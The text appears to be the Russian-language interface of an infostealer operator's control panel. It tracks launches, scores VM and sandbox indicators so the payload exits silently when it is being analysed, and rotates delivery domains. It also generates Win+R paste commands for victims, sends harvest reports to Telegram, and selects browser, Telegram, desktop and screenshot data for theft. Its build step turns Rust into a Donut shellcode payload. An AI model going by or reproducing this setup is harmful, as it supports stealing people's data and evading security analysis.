Запуски лаунчера

За 24 ч / 7 д / 30 д

—

24 часа

—

7 дней

—

30 дней

Таблица запусков

Загрузка…

Статистика

Запуски по странам

Загрузка…

Песочницы / VM

Защита от песочниц

Payload проверяет признаки виртуальной машины и песочницы перед сбором. Если обнаружена VM/sandbox — сбор не выполняется (тихий выход).

Не разворачивать на VM/Sandbox Блокировать при нулевом sandbox-скоре

Если sandbox-скор = 0 (ни одна проверка не сработала) — считать песочницей. Может давать ложные срабатывания на реальных машинах.

Исключения (разрешённые IP)

IP-адреса ваших VM/песочниц, на которых payload будет работать даже при включённой защите. Сервер автоматически отключает sandbox_check для этих IP.

Проверки (что учитывает sandbox-скор)

Проверка	Баллы
HARDWARE / VM
CPUID hypervisor bit	+35
RDTSC timing (VMEXIT)	+30
BIOS/модель: VMware, VBox, QEMU...	+30
MAC-адрес VM (VMware/VBox/Hyper-V OUI)	+25
VM-процессы (vmtoolsd, VBoxService...)	+25
VM-ключи реестра (VMware Tools, VBox GA)	+25
Модель диска: VBOX, QEMU, Virtual	+20
Sandbox DLL (sbiedll, cuckoomon...)	+30
АНТИАНАЛИЗ
Debugger attached	+40
Инструменты анализа (wireshark, ida, x64dbg...)	+35
Sleep acceleration (500ms → <400ms)	+30
ПОВЕДЕНИЕ
Uptime < 10 минут	+20
Подозрительный username	+20
Мышь не двигается (3 сек)	+15
Нет профилей браузеров	+15
RAM < 4 GB	+15
CPU < 2 ядра	+15
Экран ≤ 1024×768	+15
Диск C: < 60 GB	+15
Windows < 3 дней	+15
Процессов < 40	+10
Program Files < 8 папок	+10
Desktop < 3 файлов	+10
Недавних файлов < 10	+10
COMPUTERNAME == USERNAME	+10
СЕРВЕРНЫЕ
IP датацентра/хостинга/прокси	block
Нарушение порядка цепочки	block

Клиентский порог: ≥ 60 баллов. Типичная VM: 100+. Серверные проверки блокируют отдачу payload до выполнения.

Домены

Рабочие домены

A-запись для всех доменов: загрузка…

Укажите IP выше в A-записи каждого домена перед добавлением. При добавлении автоматически настраивается Nginx + SSL (Let's Encrypt). Домены ротируются — для каждого запроса выбирается домен с наименьшим числом использований.

Команда Win+R

Нажмите «Сгенерировать» чтобы получить команду для Win+R с автоматически выбранным доменом (с наименьшим числом использований). Можно также выбрать конкретный домен из списка.

Настройка

Сервисы

Управление системными сервисами. При остановке/перезапуске Monitor панель автоматически переподключится.

Telegram

Бот отправляет отчёты о сборах и уведомления о готовности доменов (TXT с Win+R командами) в указанный канал.

Токен бота

ID канала / чата

Логи

Удалить все записи из панели и все папки логов на сервере. Действие необратимо.

Выборка

Что собирать

Отметьте, какие данные собирать при запуске лаунчера (payload). Если галочка снята — сбор и отправка не выполняются.

Десктоп Скриншот Telegram Браузеры

Build

Создать сборку

Запускает executor_rs/build.sh (Rust → DLL → Donut → payload.bin). В папке executor_rs/Builds/ создаётся подпапка с датой и временем (24 ч), в неё кладутся payload.bin и executor_payload.dll. Сборка может занять несколько минут.